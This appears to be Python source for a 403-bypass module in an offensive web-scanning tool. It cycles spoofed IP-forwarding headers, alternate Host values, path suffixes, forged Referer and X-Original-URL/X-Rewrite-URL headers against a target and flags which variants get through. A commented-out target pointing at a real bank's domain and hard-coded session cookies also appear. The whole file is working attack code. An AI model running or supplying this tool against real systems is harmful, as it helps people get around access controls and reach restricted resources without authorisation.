def check(**kwargs): now.timed(de=0) color("[+] Scanning target domain " + kwargs['url'], 'green') #批量调用 for index in range(len(vuln_scripts)): try: vuln_scripts[index].check(**kwargs) except Exception as e: now.timed(de=0) color("[-] Running {} occured error!!!".format(exp_scripts[index]), 'yellow') continue
def Add_Proxy(url, TIMEOUT=TIMEOUT): for Trust_IP in Trust_Proxy: Add_headers = { 'X-Originating-IP': Trust_IP, 'X-Remote-IP': Trust_IP, 'X-Client-IP': Trust_IP, 'X-Forwarded-For': Trust_IP, 'X-Forwared-Host': Trust_IP, 'X-Host': Trust_IP, 'X-Custom-IP-Authorization': Trust_IP } headers = {**org_headers, **Add_headers} try: resp_code = requests.get(url=url, headers=headers, timeout=TIMEOUT, allow_redirects=False, verify = False).status_code if resp_code == 200: color('[+] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'green') elif resp_code != 403: color('[?] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'blue') else: color('[-] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'red') except Exception as error: color('[-] X-Forwarded-For: %s done!'%(Trust_IP), 'red') continue
def Change_Host(url, TIMEOUT=TIMEOUT): for i in Trust_Domain: headers = { 'Host': '%s'%i, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US, en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1' } try: resp_code = requests.get(url=url, headers=headers, timeout=TIMEOUT, allow_redirects=False, verify = False).status_code if resp_code == 200: color('[+] Host: %s %s'%(i, resp_code), 'green') elif resp_code != 403: color('[?] Host: %s %s'%(i, resp_code), 'blue') else: color('[-] Host: %s %s'%(i, resp_code), 'red') except Exception as error: color('[-] Host: %s done!'%i, 'red') continue
def Add_Extend(url, TIMEOUT=TIMEOUT): for i in Trust_Extend: url_new = url + i try: resp_code = requests.get(url=url_new, headers=org_headers, timeout=TIMEOUT, allow_redirects=False, verify = False).status_code if resp_code == 200: color('[+] url: %s %s'%(url_new, resp_code), 'green') elif resp_code != 403: color('[?] url: %s %s'%(url_new, resp_code), 'blue') else: color('[-] url: %s %s'%(url_new, resp_code), 'red') except Exception as error: color('[-] url: %s done!'%(url_new), 'red') continue finally: url_new = None
def Add_Referer(url, TIMEOUT=TIMEOUT): for i in Trust_Referer: Add_headers = { 'Referer': i } headers = {**org_headers, **Add_headers} try: resp_code = requests.get(url=url, headers=headers, timeout=TIMEOUT, allow_redirects=False, verify = False).status_code if resp_code == 200: color('[+] Referer: %s %s'%(i, resp_code), 'green') elif resp_code != 403: color('[?] Referer: %s %s'%(i, resp_code), 'blue') else: color('[-] Referer: %s %s'%(i, resp_code), 'red') except Exception as error: color('[-] Referer: %s done!'%(i), 'red') continue
def Add_Original(url, TIMEOUT=TIMEOUT): for i in Trust_Original: Add_headers = { 'X-Original-URL': i, 'X-Rewrite-URL': i } headers = {**org_headers, **Add_headers} try: resp_code = requests.get(url=url, headers=headers, timeout=TIMEOUT, allow_redirects=False, #proxies=proxies, verify = False).status_code if resp_code == 200: color('[+] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'green') elif resp_code != 403: color('[?] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'blue') else: color('[-] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'red') except Exception as error: color('[-] X-Original-URL/X-Rewrite-URL: %s done!'%(i), 'red') continue
def check(**kwargs): url = kwargs['url'] #url = 'https://moa.cmbc.com.cn/moastatic' try: resp_code = requests.get(url=url, headers=org_headers, timeout=TIMEOUT, #allow_redirects=False, verify = False).status_code if resp_code != 403: color('[-] Page has not return 403!', 'red') return except Exception as error: color('[-] An error occurred %s'%type(error), 'red') return #url = url.strip('/') color('[*] Scanning target domain %s'%url, 'green') Change_Host(url) Add_Original(url) Add_Referer(url) Add_Proxy(url) Add_Extend(url)